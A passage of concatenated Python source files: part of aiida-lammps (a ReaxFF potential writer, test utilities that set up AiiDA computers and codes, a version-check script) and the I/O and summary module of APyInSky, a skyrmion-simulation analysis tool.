for key in sorted(data["3body"]):
subdata = data["3body"][key]
if not set(subdata.keys()).issuperset(KEYS_3BODY_ANGLES):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join([format_lammps_value(subdata[k]) for k in KEYS_3BODY_ANGLES])
]
)
output.extend(
["{0} ! Nr of angles;at1;at2;at3;Thetao,o;ka;kb;pv1;pv2".format(len(suboutout))]
+ suboutout
)
# four-body torsion parameters
suboutout = []
for key in sorted(data["4body"]):
subdata = data["4body"][key]
if not set(subdata.keys()).issuperset(KEYS_4BODY_TORSION):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join(
[format_lammps_value(subdata[k]) for k in KEYS_4BODY_TORSION]
)
]
)
output.extend(
[
"{0} ! Nr of torsions;at1;at2;at3;at4;;V1;V2;V3;V2(BO);vconj;n.u;n".format(
len(suboutout)
)
]
+ suboutout
)
# three-body h-bond parameters
suboutout = []
for key in sorted(data["3body"]):
subdata = data["3body"][key]
if not set(subdata.keys()).issuperset(KEYS_3BODY_HBOND):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join([format_lammps_value(subdata[k]) for k in KEYS_3BODY_HBOND])
]
)
output.extend(
["{0} ! Nr of hydrogen bonds;at1;at2;at3;Rhb;Dehb;vhb1".format(len(suboutout))]
+ suboutout
)
output.append("")
return "\n".join(output)
def filter_by_species(data, species):
"""filter a potential dict by a subset of species
Parameters
----------
data : dict
a potential or fitting dict
species : list[str]
the species to filter by
Returns
-------
dict
data filtered by species and with all species index keys re-indexed
Raises
------
KeyError
if the data does not adhere to the potential or fitting jsonschema
AssertionError
if the filter set is not a subset of the available species
"""
species = sorted(list(set(species)))
if not set(species).issubset(data["species"]):
raise AssertionError(
"the filter set ({}) is not a subset of the available species ({})".format(
set(species), set(data["species"])
)
)
data = copy.deepcopy(data)
indices = set([str(i) for i, s in enumerate(data["species"]) if s in species])
def convert_indices(key):
return INDEX_SEP.join(
[str(species.index(data["species"][int(k)])) for k in key.split(INDEX_SEP)]
)
for key in ["1body", "2body", "3body", "4body"]:
if key not in data:
continue
data[key] = {
convert_indices(k): v
for k, v in data[key].items()
if indices.issuperset(k.split(INDEX_SEP))
}
data["species"] = species
return data
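# Hedged usage sketch (not part of the original module): restricting a parsed potential to a
# subset of species and writing it back in LAMMPS format; the species labels are assumptions
# and must match entries in data["species"].
def _example_filter_and_write(data, species=("Fe core", "S core")):
    """Return the LAMMPS-format text of the potential restricted to ``species``."""
    return write_lammps_format(filter_by_species(data, list(species)))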
```
#### File: aiida_lammps/tests/test_generate_structure.py
```python
import pytest
from aiida_lammps.common.generate_structure import generate_lammps_structure
@pytest.mark.parametrize(
"structure", ["Fe", "pyrite", "fes_cubic-zincblende", "greigite"]
)
def test_generate(db_test_app, get_structure_data, structure, file_regression):
structure = get_structure_data(structure)
text, transform = generate_lammps_structure(structure, round_dp=8)
file_regression.check(text)
```
#### File: aiida_lammps/tests/utils.py
```python
from collections.abc import Mapping
from contextlib import contextmanager
import distutils.spawn
import os
import re
import subprocess
import sys
TEST_DIR = os.path.dirname(os.path.realpath(__file__))
def lammps_version(executable="lammps"):
"""Get the version of lammps.
we assume `lammps -h` returns e.g. 'LAMMPS (10 Feb 2015)' or
'Large-scale Atomic/Molecular Massively Parallel Simulator - 5 Jun 2019'
"""
out_text = subprocess.check_output([executable, "-h"]).decode("utf8")
match = re.search(r"LAMMPS \((.*)\)", out_text)
if match:
return match.group(1)
regex = re.compile(
r"^Large-scale Atomic/Molecular Massively Parallel Simulator - (.*)$",
re.MULTILINE,
)
match = re.search(regex, out_text)
if match:
return match.group(1).strip()
raise IOError("Could not find version from `{} -h`".format(executable))
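# Hedged usage note (not part of the original module): for example, lammps_version("lmp_serial")
# would return the date string reported by `lmp_serial -h`, such as '10 Feb 2015'.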
def get_path_to_executable(executable):
"""Get path to local executable.
:param executable: Name of executable in the $PATH variable
:type executable: str
:return: path to executable
:rtype: str
"""
path = None
# issue with distutils finding scripts within the python path
# (i.e. those created by pip install)
script_path = os.path.join(os.path.dirname(sys.executable), executable)
if os.path.exists(script_path):
path = script_path
if path is None:
path = distutils.spawn.find_executable(executable)
if path is None:
raise ValueError("{} executable not found in PATH.".format(executable))
return os.path.abspath(path)
def get_or_create_local_computer(work_directory, name="localhost"):
"""Retrieve or setup a local computer
Parameters
----------
work_directory : str
path to a local directory for running computations in
name : str
name of the computer
Returns
-------
aiida.orm.computers.Computer
"""
from aiida.common import NotExistent
from aiida.orm import Computer
try:
computer = Computer.objects.get(label=name)
except NotExistent:
computer = Computer(
label=name,
hostname="localhost",
description=("localhost computer, " "set up by aiida_lammps tests"),
transport_type="local",
scheduler_type="direct",
workdir=os.path.abspath(work_directory),
)
computer.store()
computer.configure()
return computer
def get_or_create_code(entry_point, computer, executable, exec_path=None):
"""Setup code on localhost computer"""
from aiida.common import NotExistent
from aiida.orm import Code, Computer
if isinstance(computer, str):
computer = Computer.objects.get(label=computer)
try:
code = Code.objects.get(
label="{}-{}-{}".format(entry_point, executable, computer.label)
)
except NotExistent:
if exec_path is None:
exec_path = get_path_to_executable(executable)
code = Code(
input_plugin_name=entry_point, remote_computer_exec=[computer, exec_path]
)
code.label = "{}-{}-{}".format(entry_point, executable, computer.label)
code.store()
return code
def get_default_metadata(
max_num_machines=1,
max_wallclock_seconds=1800,
with_mpi=False,
num_mpiprocs_per_machine=1,
):
"""
Return an instance of the metadata dictionary with the minimally required parameters
for a CalcJob and set to default values unless overridden
:param max_num_machines: set the number of nodes, default=1
:param max_wallclock_seconds: set the maximum number of wallclock seconds, default=1800
:param with_mpi: whether to run the calculation with MPI enabled
:param num_mpiprocs_per_machine: set the number of cpus per node, default=1
:rtype: dict
"""
return {
"options": {
"resources": {
"num_machines": int(max_num_machines),
"num_mpiprocs_per_machine": int(num_mpiprocs_per_machine),
},
"max_wallclock_seconds": int(max_wallclock_seconds),
"withmpi": with_mpi,
}
}
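# Hedged usage sketch (not part of the original module); the entry point and executable
# names below are assumptions used only for illustration:
#   computer = get_or_create_local_computer('/tmp/aiida_work', 'localhost')
#   code = get_or_create_code('lammps.md', computer, 'lmp_serial')
#   metadata = get_default_metadata(max_wallclock_seconds=600)
#   # metadata['options'] then carries the resources and wallclock settings for a CalcJob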
def recursive_round(ob, dp, apply_lists=False):
""" map a function on to all values of a nested dictionary """
if isinstance(ob, Mapping):
return {k: recursive_round(v, dp, apply_lists) for k, v in ob.items()}
elif apply_lists and isinstance(ob, (list, tuple)):
return [recursive_round(v, dp, apply_lists) for v in ob]
elif isinstance(ob, float):
return round(ob, dp)
else:
return ob
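# Hedged example (not part of the original module):
#   recursive_round({'energy': 1.23456, 'forces': [0.111111, 0.98765]}, 2, apply_lists=True)
#   returns {'energy': 1.23, 'forces': [0.11, 0.99]}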
class AiidaTestApp(object):
def __init__(self, work_directory, executable_map, environment=None):
"""a class providing methods for testing purposes
Parameters
----------
work_directory : str
path to a local work directory (used when creating computers)
executable_map : dict
mapping of computation entry points to the executable name
environment : None or aiida.manage.fixtures.FixtureManager
manager of a temporary AiiDA environment
"""
self._environment = environment
self._work_directory = work_directory
self._executables = executable_map
@property
def work_directory(self):
"""return path to the work directory"""
return self._work_directory
@property
def environment(self):
"""return manager of a temporary AiiDA environment"""
return self._environment
def get_or_create_computer(self, name="localhost"):
"""Setup localhost computer"""
return get_or_create_local_computer(self.work_directory, name)
def get_or_create_code(self, entry_point, computer_name="localhost"):
"""Setup code on localhost computer"""
computer = self.get_or_create_computer(computer_name)
try:
executable = self._executables[entry_point]
except KeyError:
raise KeyError(
"Entry point {} not recognized. Allowed values: {}".format(
entry_point, self._executables.keys()
)
)
return get_or_create_code(entry_point, computer, executable)
@staticmethod
def get_default_metadata(
max_num_machines=1, max_wallclock_seconds=1800, with_mpi=False
):
return get_default_metadata(max_num_machines, max_wallclock_seconds, with_mpi)
@staticmethod
def get_parser_cls(entry_point_name):
"""load a parser class
Parameters
----------
entry_point_name : str
entry point name of the parser class
Returns
-------
aiida.parsers.parser.Parser
"""
from aiida.plugins import ParserFactory
return ParserFactory(entry_point_name)
@staticmethod
def get_data_node(entry_point_name, **kwargs):
"""load a data node instance
Parameters
----------
entry_point_name : str
entry point name of the data node class
Returns
-------
aiida.orm.nodes.data.Data
"""
from aiida.plugins import DataFactory
return DataFactory(entry_point_name)(**kwargs)
@staticmethod
def get_calc_cls(entry_point_name):
"""load a data node class
Parameters
----------
entry_point_name : str
entry point name of the data node class
"""
from aiida.plugins import CalculationFactory
return CalculationFactory(entry_point_name)
def generate_calcjob_node(
self, entry_point_name, retrieved, computer_name="localhost", attributes=None
):
"""Fixture to generate a mock `CalcJobNode` for testing parsers.
Parameters
----------
entry_point_name : str
entry point name of the calculation class
retrieved : aiida.orm.FolderData
containing the file(s) to be parsed
computer_name : str
used to get or create a ``Computer``, by default 'localhost'
attributes : None or dict
any additional attributes to set on the node
Returns
-------
aiida.orm.CalcJobNode
instance with the `retrieved` node linked as outgoing
"""
from aiida.common.links import LinkType
from aiida.orm import CalcJobNode
from aiida.plugins.entry_point import format_entry_point_string
process = self.get_calc_cls(entry_point_name)
computer = self.get_or_create_computer(computer_name)
entry_point = format_entry_point_string("aiida.calculations", entry_point_name)
node = CalcJobNode(computer=computer, process_type=entry_point)
node.set_options(
{
k: v.default() if callable(v.default) else v.default
for k, v in process.spec_options.items()
if v.has_default()
}
)
node.set_option("resources", {"num_machines": 1, "num_mpiprocs_per_machine": 1})
node.set_option("max_wallclock_seconds", 1800)
if attributes:
node.set_attributes(attributes)
node.store()
retrieved.add_incoming(node, link_type=LinkType.CREATE, link_label="retrieved")
retrieved.store()
return node
@contextmanager
def sandbox_folder(self):
"""AiiDA folder object context.
Yields
------
aiida.common.folders.SandboxFolder
"""
from aiida.common.folders import SandboxFolder
with SandboxFolder() as folder:
yield folder
@staticmethod
def generate_calcinfo(entry_point_name, folder, inputs=None):
"""generate a `CalcInfo` instance for testing calculation jobs.
A new `CalcJob` process instance is instantiated,
and `prepare_for_submission` is called to populate the supplied folder,
with raw inputs.
Parameters
----------
entry_point_name: str
folder: aiida.common.folders.Folder
inputs: dict or None
"""
from aiida.engine.utils import instantiate_process
from aiida.manage.manager import get_manager
from aiida.plugins import CalculationFactory
manager = get_manager()
runner = manager.get_runner()
process_class = CalculationFactory(entry_point_name)
        process = instantiate_process(runner, process_class, **(inputs or {}))
calc_info = process.prepare_for_submission(folder)
return calc_info
```
#### File: aiida-lammps/.pre-commit/check_version.py
```python
import json
import os
import sys
import click
FILENAME_SETUP_JSON = "setup.json"
SCRIPT_PATH = os.path.split(os.path.realpath(__file__))[0]
ROOT_DIR = os.path.join(SCRIPT_PATH, os.pardir)
FILEPATH_SETUP_JSON = os.path.join(ROOT_DIR, FILENAME_SETUP_JSON)
def get_setup_json():
"""Return the `setup.json` as a python dictionary."""
with open(FILEPATH_SETUP_JSON, "r") as handle:
setup_json = json.load(handle) # , object_pairs_hook=OrderedDict)
return setup_json
@click.group()
def cli():
"""Command line interface for pre-commit checks."""
pass
@cli.command("version")
def validate_version():
"""Check that version numbers match.
    Check version number in setup.json and aiida_lammps/__init__.py and make sure
they match.
"""
# Get version from python package
sys.path.insert(0, ROOT_DIR)
import aiida_lammps # pylint: disable=wrong-import-position
version = aiida_lammps.__version__
setup_content = get_setup_json()
if version != setup_content["version"]:
click.echo("Version number mismatch detected:")
click.echo(
"Version number in '{}': {}".format(
FILENAME_SETUP_JSON, setup_content["version"]
)
)
click.echo(
"Version number in '{}/__init__.py': {}".format("aiida_lammps", version)
)
click.echo(
"Updating version in '{}' to: {}".format(FILENAME_SETUP_JSON, version)
)
setup_content["version"] = version
with open(FILEPATH_SETUP_JSON, "w") as fil:
# Write with indentation of two spaces and explicitly define separators to not have spaces at end of lines
json.dump(setup_content, fil, indent=2, separators=(",", ": "))
sys.exit(1)
if __name__ == "__main__":
cli() # pylint: disable=no-value-for-parameter
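# Hedged usage note (not part of the original script): the check is normally run from the
# repository root, e.g. as a pre-commit hook or manually via
#   python .pre-commit/check_version.py version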
``` |
{
"source": "JPchico/APyInSky",
"score": 3
} |
#### File: APyInSky/src/SK_IO_control.py
```python
def SK_init():
"""Initialization of variables to their defaults values. Reading of the inputfile to gather the necessary data for analysis.
Returns
----------
- Skx_control: (dict) dictionary containing all the needed control parameters
Author
----------
<NAME>
"""
Skx_control=set_control_defaults()
Skx_control=input_gatherer(Skx_control)
return Skx_control
def input_gatherer(Skx_control):
""" Reads the input controller for the script from a yaml file which contains all the necessary input to run APyInSky.
    The 'Skx_inp.yml' file contains the following information:
- Data_control:
- Fig_control:
- dpi: (float) dpi of the figures printed.
- height: (float) height of the figures printed.
- width: (float) width of the figures printed.
- fontsize: (float) size of the fonts used in the plots.
- zoom_factor: (float) how zoomed to the skyrmion the profile is
Returns
----------
- Skx_control: (dict) dictionary containing all the needed control parameters
Author
----------
<NAME>
"""
import yaml
import sys
import numpy as np
print("#"*80)
print("# Welcome to APyInSky!")
print("#"*80)
try:
with open("Skx_inp.yml", 'r') as stream:
            Skx_inp = yaml.safe_load(stream)
except:
print("No 'Skx_inp.yml' file found. Shutting down")
sys.exit()
Skx_control=update(Skx_control,Skx_inp)
del Skx_inp
# Transform the list to a numpy array for easier manipulation
try:
Skx_control['Data_control']['Misc']['imp_pos']=\
np.asarray(Skx_control['Data_control']['Misc']['imp_pos'])
# Multiply by the lattice constant to be able to place it correctly in the plots
Skx_control['Data_control']['Misc']['imp_pos']=\
Skx_control['Data_control']['Misc']['alat']*Skx_control['Data_control']['Misc']['imp_pos']
except:
pass
try:
Skx_control['Data_control']['Skyrmion_velocity']['time_step']=\
float(Skx_control['Data_control']['Skyrmion_velocity']['time_step'])
except:
Skx_control['Data_control']['Skyrmion_velocity']['time_step']=1e-16
print('No time step given. Assuming 1e-16 s')
try:
if len(Skx_control['Data_control']['file_name'])>1:
Skx_control['Data_control']['file_name']=\
'_'+Skx_control['Data_control']['file_name']
except:
pass
return Skx_control
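# Hedged example (not part of the original module) of a minimal 'Skx_inp.yml', mirroring the
# defaults defined in set_control_defaults(); every entry is optional since missing keys fall
# back to their defaults through update():
#   Fig_control:
#     dpi: 300
#     zoom_factor: 0.2
#   Data_control:
#     path: ./run_001
#     out_path: ./analysis
#     Skyrmion_velocity:
#       execute: True
#       time_step: 1e-15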
def update(d, u):
    """Recursive function to update the keys of a dictionary such that if no values are given in the input the defaults are used. Small modification of the routine presented in
    https://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth
    """
    import collections.abc
    for k, v in u.items():
        if isinstance(v, collections.abc.Mapping):
d[k] = update(d.get(k, {}), v)
else:
d[k] = v
return d
def set_control_defaults():
"""
Function to define the default values of the parameters, such that if the user does not define something the code can still be safely used.
Author
----------
<NAME>
"""
Skx_control=dict()
Skx_control['Fig_control']=dict()
Skx_control['Fig_control']['dpi']=800
Skx_control['Fig_control']['height']=10
Skx_control['Fig_control']['width']=16
Skx_control['Fig_control']['fontsize']=28
Skx_control['Fig_control']['zoom_factor']=0.15
Skx_control['Fig_control']['tex_fonts']=False
Skx_control['Data_control']=dict()
Skx_control['Data_control']['path']='./'
Skx_control['Data_control']['out_path']='./'
Skx_control['Data_control']['Misc']=dict()
Skx_control['Data_control']['Misc']['alat']=0.392
Skx_control['Data_control']['Misc']['imp_pos']=[]
Skx_control['Data_control']['Misc']['zipped']=False
Skx_control['Data_control']['Misc']['sub_index']=0
Skx_control['Data_control']['Misc']['gridpoint']=[500,500]
Skx_control['Data_control']['Topology']=dict()
Skx_control['Data_control']['Topology']['execute']=False
Skx_control['Data_control']['Skyrmion_velocity']=dict()
Skx_control['Data_control']['Skyrmion_velocity']['execute']=False
Skx_control['Data_control']['Skyrmion_velocity']['time_step']=float(1e-16)
Skx_control['Data_control']['Skyrmion_velocity']['plot']=False
Skx_control['Data_control']['Skyrmion_velocity']['plot_energy']=False
Skx_control['Data_control']['Skyrmion_velocity']['comp_energy']=False
Skx_control['Data_control']['profile']=dict()
Skx_control['Data_control']['profile']['execute']=False
Skx_control['Data_control']['Skx_threshold']=0.8
Skx_control['Data_control']['file_name']=''
return Skx_control
def SK_overview(file_name,pos_bare,pos_grid,pos_filt,vel_bare,vel_bare_mod, \
vel_grid,vel_grid_mod,vel_filt,vel_filt_mod,vel_smooth,vel_smooth_mod, \
rad_bare,rad_grid):
"""Function to write in a dictionary relevant quantities of the positions, velocities, and radii
of the skyrmion.
Args
----------
    - file_name: (str) name of the output yaml file
- pos_bare: (float [N,3] array) positions of the skyrmion core from bare data
- pos_grid: (float [N,3] array) positions of the skyrmion core from interpolated data
- pos_filt: (float [N,3] array) positions of the skyrmion core from smoothed data
- vel_bare: (float [N,3] array) velocity of the skyrmion from bare data
- vel_bare_mod: (float [N] array) speed of the skyrmion from bare data
- vel_grid: (float [N,3] array) velocity of the skyrmion from interpolated data
- vel_grid_mod: (float [N] array) speed of the skyrmion from interpolated data
- vel_filt: (float [N,3] array) velocity of the skyrmion from filtered data
- vel_filt_mod: (float [N] array) speed of the skyrmion from filtered data
- vel_smooth: (float [N,3] array) velocity of the skyrmion from smooth data
- vel_smooth_mod: (float [N] array) speed of the skyrmion from smooth data
- rad_bare: (float [N] array) radius of the skyrmion from bare data
- rad_grid: (float [N] array) radius of the skyrmion from interpolated data
Author
----------
<NAME>
"""
import numpy as np
import yaml
from collections import OrderedDict
ten_perc=int(len(vel_grid)*0.1)
ninety_perc=int(len(vel_grid)*0.9)
SK_summary=OrderedDict()
#---------------------------------------------------------------------------
# Position dictionary
#---------------------------------------------------------------------------
SK_summary['core_position']=OrderedDict()
SK_summary['core_position']['method']=OrderedDict()
#---------------------------------------------------------------------------
# Bare positions
#---------------------------------------------------------------------------
SK_summary['core_position']['method']['bare']=OrderedDict()
SK_summary['core_position']['method']['bare']['min']=[ \
float(np.amin(pos_bare[:,0])),\
float(np.amin(pos_bare[:,1])),\
float(np.amin(pos_bare[:,2]))\
]
SK_summary['core_position']['method']['bare']['max']=[ \
float(np.amax(pos_bare[:,0])),\
float(np.amax(pos_bare[:,1])),\
float(np.amax(pos_bare[:,2]))\
]
SK_summary['core_position']['method']['bare']['mean']=[ \
float(np.mean(pos_bare[:,0])),\
float(np.mean(pos_bare[:,1])),\
float(np.mean(pos_bare[:,2]))\
]
#---------------------------------------------------------------------------
# Grid positions
#---------------------------------------------------------------------------
SK_summary['core_position']['method']['grid']=OrderedDict()
SK_summary['core_position']['method']['grid']['min']=[ \
float(np.amin(pos_grid[:,0])),\
float(np.amin(pos_grid[:,1])),\
float(np.amin(pos_grid[:,2]))\
]
SK_summary['core_position']['method']['grid']['max']=[ \
float(np.amax(pos_grid[:,0])),\
float(np.amax(pos_grid[:,1])),\
float(np.amax(pos_grid[:,2]))\
]
SK_summary['core_position']['method']['grid']['mean']=[ \
float(np.mean(pos_grid[:,0])),\
float(np.mean(pos_grid[:,1])),\
float(np.mean(pos_grid[:,2]))\
]
#---------------------------------------------------------------------------
# Filtered positions
#---------------------------------------------------------------------------
SK_summary['core_position']['method']['filt']=OrderedDict()
SK_summary['core_position']['method']['filt']['min']=[ \
float(np.amin(pos_filt[:,0])),\
float(np.amin(pos_filt[:,1])),\
float(np.amin(pos_filt[:,2]))\
]
SK_summary['core_position']['method']['filt']['max']=[ \
float(np.amax(pos_filt[:,0])),\
float(np.amax(pos_filt[:,1])),\
float(np.amax(pos_filt[:,2]))\
]
SK_summary['core_position']['method']['filt']['mean']=[ \
float(np.mean(pos_filt[:,0])),\
float(np.mean(pos_filt[:,1])),\
float(np.mean(pos_filt[:,2]))\
]
#---------------------------------------------------------------------------
# Velocity dictionary
#---------------------------------------------------------------------------
SK_summary['vel']=OrderedDict()
SK_summary['vel']['method']=OrderedDict()
#---------------------------------------------------------------------------
# Bare Velocity
#---------------------------------------------------------------------------
SK_summary['vel']['method']['bare']=OrderedDict()
SK_summary['vel']['method']['bare']['min']=[ \
float(np.amin(vel_bare[:,0])),\
float(np.amin(vel_bare[:,1])),\
float(np.amin(vel_bare[:,2]))\
]
SK_summary['vel']['method']['bare']['max']=[ \
float(np.amax(vel_bare[:,0])),\
float(np.amax(vel_bare[:,1])),\
float(np.amax(vel_bare[:,2]))\
]
SK_summary['vel']['method']['bare']['mean']=[ \
float(np.mean(vel_bare[:,0])),\
float(np.mean(vel_bare[:,1])),\
float(np.mean(vel_bare[:,2]))\
]
SK_summary['vel']['method']['bare']['t_ini']=[ \
float(np.mean(vel_bare[0:ten_perc,0])),\
float(np.mean(vel_bare[0:ten_perc,1])),\
float(np.mean(vel_bare[0:ten_perc,2]))\
]
SK_summary['vel']['method']['bare']['t_fin']=[ \
float(np.mean(vel_bare[ninety_perc:,0])),\
float(np.mean(vel_bare[ninety_perc:,1])),\
float(np.mean(vel_bare[ninety_perc:,2]))\
]
#---------------------------------------------------------------------------
# Interpolated Velocity
#---------------------------------------------------------------------------
SK_summary['vel']['method']['grid']=OrderedDict()
SK_summary['vel']['method']['grid']['min']=[ \
float(np.amin(vel_grid[:,0])),\
float(np.amin(vel_grid[:,1])),\
float(np.amin(vel_grid[:,2]))\
]
SK_summary['vel']['method']['grid']['max']=[ \
float(np.amax(vel_grid[:,0])),\
float(np.amax(vel_grid[:,1])),\
float(np.amax(vel_grid[:,2]))\
]
SK_summary['vel']['method']['grid']['mean']=[ \
float(np.mean(vel_grid[:,0])),\
float(np.mean(vel_grid[:,1])),\
float(np.mean(vel_grid[:,2]))\
]
SK_summary['vel']['method']['grid']['t_ini']=[ \
float(np.mean(vel_grid[0:ten_perc,0])),\
float(np.mean(vel_grid[0:ten_perc,1])),\
float(np.mean(vel_grid[0:ten_perc,2]))\
]
SK_summary['vel']['method']['grid']['t_fin']=[ \
float(np.mean(vel_grid[ninety_perc:,0])),\
float(np.mean(vel_grid[ninety_perc:,1])),\
float(np.mean(vel_grid[ninety_perc:,2]))\
]
#---------------------------------------------------------------------------
# Filtered Velocity
#---------------------------------------------------------------------------
SK_summary['vel']['method']['filt']=OrderedDict()
SK_summary['vel']['method']['filt']['min']=[ \
float(np.amin(vel_filt[:,0])),\
float(np.amin(vel_filt[:,1])),\
float(np.amin(vel_filt[:,2]))\
]
SK_summary['vel']['method']['filt']['max']=[ \
float(np.amax(vel_filt[:,0])),\
float(np.amax(vel_filt[:,1])),\
float(np.amax(vel_filt[:,2]))\
]
SK_summary['vel']['method']['filt']['mean']=[ \
float(np.mean(vel_filt[:,0])),\
float(np.mean(vel_filt[:,1])),\
float(np.mean(vel_filt[:,2]))\
]
SK_summary['vel']['method']['filt']['t_ini']=[ \
float(np.mean(vel_filt[0:ten_perc,0])),\
float(np.mean(vel_filt[0:ten_perc,1])),\
float(np.mean(vel_filt[0:ten_perc,2]))\
]
SK_summary['vel']['method']['filt']['t_fin']=[ \
float(np.mean(vel_filt[ninety_perc:,0])),\
float(np.mean(vel_filt[ninety_perc:,1])),\
float(np.mean(vel_filt[ninety_perc:,2]))\
]
#---------------------------------------------------------------------------
# Smooth Velocity
#---------------------------------------------------------------------------
SK_summary['vel']['method']['smooth']=OrderedDict()
SK_summary['vel']['method']['smooth']['min']=[ \
float(np.amin(vel_smooth[:,0])),\
float(np.amin(vel_smooth[:,1])),\
float(np.amin(vel_smooth[:,2]))\
]
SK_summary['vel']['method']['smooth']['max']=[ \
float(np.amax(vel_smooth[:,0])),\
float(np.amax(vel_smooth[:,1])),\
float(np.amax(vel_smooth[:,2]))\
]
SK_summary['vel']['method']['smooth']['mean']=[ \
float(np.mean(vel_smooth[:,0])),\
float(np.mean(vel_smooth[:,1])),\
float(np.mean(vel_smooth[:,2]))\
]
SK_summary['vel']['method']['smooth']['t_ini']=[ \
float(np.mean(vel_smooth[0:ten_perc,0])),\
float(np.mean(vel_smooth[0:ten_perc,1])),\
float(np.mean(vel_smooth[0:ten_perc,2]))\
]
SK_summary['vel']['method']['smooth']['t_fin']=[ \
float(np.mean(vel_smooth[ninety_perc:,0])),\
float(np.mean(vel_smooth[ninety_perc:,1])),\
float(np.mean(vel_smooth[ninety_perc:,2]))\
]
#---------------------------------------------------------------------------
# Speed dictionary
#---------------------------------------------------------------------------
SK_summary['speed']=OrderedDict()
SK_summary['speed']['method']=OrderedDict()
#---------------------------------------------------------------------------
# Bare Speed
#---------------------------------------------------------------------------
SK_summary['speed']['method']['bare']=OrderedDict()
SK_summary['speed']['method']['bare']['min']=float(np.amin(vel_bare_mod))
SK_summary['speed']['method']['bare']['max']=float(np.amax(vel_bare_mod))
SK_summary['speed']['method']['bare']['mean']=float(np.mean(vel_bare_mod))
SK_summary['speed']['method']['bare']['t_ini']= \
float(np.mean(vel_bare_mod[0:ten_perc]))
SK_summary['speed']['method']['bare']['t_fin']= \
float(np.mean(vel_bare_mod[ninety_perc:]))
#---------------------------------------------------------------------------
# Interpolated Speed
#---------------------------------------------------------------------------
SK_summary['speed']['method']['grid']=OrderedDict()
SK_summary['speed']['method']['grid']['min']=float(np.amin(vel_grid_mod))
SK_summary['speed']['method']['grid']['max']=float(np.amax(vel_grid_mod))
SK_summary['speed']['method']['grid']['mean']=float(np.mean(vel_grid_mod))
SK_summary['speed']['method']['grid']['t_ini']= \
float(np.mean(vel_grid_mod[0:ten_perc]))
SK_summary['speed']['method']['grid']['t_fin']= \
float(np.mean(vel_grid_mod[ninety_perc:]))
#---------------------------------------------------------------------------
# Filtered Speed
#---------------------------------------------------------------------------
SK_summary['speed']['method']['filt']=OrderedDict()
SK_summary['speed']['method']['filt']['min']=float(np.amin(vel_filt_mod))
SK_summary['speed']['method']['filt']['max']=float(np.amax(vel_filt_mod))
SK_summary['speed']['method']['filt']['mean']=float(np.mean(vel_filt_mod))
SK_summary['speed']['method']['filt']['t_ini']= \
float(np.mean(vel_filt_mod[0:ten_perc]))
SK_summary['speed']['method']['filt']['t_fin']= \
float(np.mean(vel_filt_mod[ninety_perc:]))
#---------------------------------------------------------------------------
# Smooth Speed
#---------------------------------------------------------------------------
SK_summary['speed']['method']['smooth']=OrderedDict()
SK_summary['speed']['method']['smooth']['min']= \
float(np.amin(vel_smooth_mod))
SK_summary['speed']['method']['smooth']['max']= \
float(np.amax(vel_smooth_mod))
SK_summary['speed']['method']['smooth']['mean']= \
float(np.mean(vel_smooth_mod))
SK_summary['speed']['method']['smooth']['t_ini']= \
float(np.mean(vel_smooth_mod[0:ten_perc]))
SK_summary['speed']['method']['smooth']['t_fin']= \
float(np.mean(vel_smooth_mod[ninety_perc:]))
#---------------------------------------------------------------------------
# Radius dictionary
#---------------------------------------------------------------------------
SK_summary['radius']=OrderedDict()
SK_summary['radius']['method']=OrderedDict()
#---------------------------------------------------------------------------
# Bare Velocity
#---------------------------------------------------------------------------
SK_summary['radius']['method']['bare']=OrderedDict()
SK_summary['radius']['method']['bare']['min']=float(np.amin(rad_bare))
SK_summary['radius']['method']['bare']['max']=float(np.amax(rad_bare))
SK_summary['radius']['method']['bare']['mean']=float(np.mean(rad_bare))
SK_summary['radius']['method']['bare']['t_ini']= \
float(np.mean(rad_bare[0:ten_perc]))
SK_summary['radius']['method']['bare']['t_fin']= \
float(np.mean(rad_bare[ninety_perc:]))
#---------------------------------------------------------------------------
# Interpolated Velocity
#---------------------------------------------------------------------------
SK_summary['radius']['method']['grid']=OrderedDict()
SK_summary['radius']['method']['grid']['min']=float(np.amin(rad_grid))
SK_summary['radius']['method']['grid']['max']=float(np.amax(rad_grid))
SK_summary['radius']['method']['grid']['mean']=float(np.mean(rad_grid))
SK_summary['radius']['method']['grid']['t_ini']= \
float(np.mean(rad_grid[0:ten_perc]))
SK_summary['radius']['method']['grid']['t_fin']= \
float(np.mean(rad_grid[ninety_perc:]))
#---------------------------------------------------------------------------
    # Setting options for the yaml file and printing to file
#---------------------------------------------------------------------------
yaml.add_representer(OrderedDict, lambda dumper, data: dumper.represent_mapping('tag:yaml.org,2002:map', data.items()))
with open(file_name, 'w') as outfile:
yaml.dump(SK_summary, outfile,default_flow_style=False)
del SK_summary
return
def SK_static_overview(file_name,topo_charge,pos,rad,deviation):
"""
Writing key information from the static profile to file to a yaml file for ease of access.
Args
----------
- file_name: (str) name of the output file.
- topo_charge: (float) topological charge of the configuration.
- pos: (float [2] array) position of the skyrmion core
- rad: (float) radius of the skyrmion
- deviation: (float) deviation from a perfect circle
Author
----------
<NAME>
"""
import yaml
from collections import OrderedDict
SK_summary=OrderedDict()
SK_summary['radius']=float(rad)
SK_summary['topo_charge']=float(topo_charge)
SK_summary['deviation']=float(deviation)
SK_summary['core_pos']=[float(pos[0]),float(pos[1])]
yaml.add_representer(OrderedDict, lambda dumper, data: dumper.represent_mapping('tag:yaml.org,2002:map', data.items()))
with open(file_name, 'w') as outfile:
yaml.dump(SK_summary, outfile,default_flow_style=False)
del SK_summary
return
def file_handler(path,zipped,file_prefix,file_suffix='.out'):
"""File wrapper to read, untar and extract the necessary data for the given function that is being analysed.
Args
----------
- path: (str) path to the desired folder
- zipped: (boolean) indicating if the data is in a tar.gz
- file_prefix: (str) prefix of the file that one wishes to extract data from.
* coord: coordinates of all the atoms in the simulation box
* restart: magnetic configuration of all the atoms in the simulation box.
* moment: time evolution of the magnetic configuration for all the atoms in the simulation box.
* posfile_clus: position of the atoms in the cluster.
* totenergy: total energy per atom in the system.
* rate_if: barriers and pre-factors from the GNEB calculation.
* enfit_path: fitted energy landscape from GENB.
* localenergy: site dependent energy
- file_suffix: (str) suffix of the file to discriminate between input and output files that have the same prefix (default='out')
Returns
----------
- data: numpy array containing the data extracted from the file.
Author
----------
<NAME>
"""
import glob
import tarfile
import pandas as pd
import numpy as np
# If the file is in a tar.gz special care must be paid to it
if zipped:
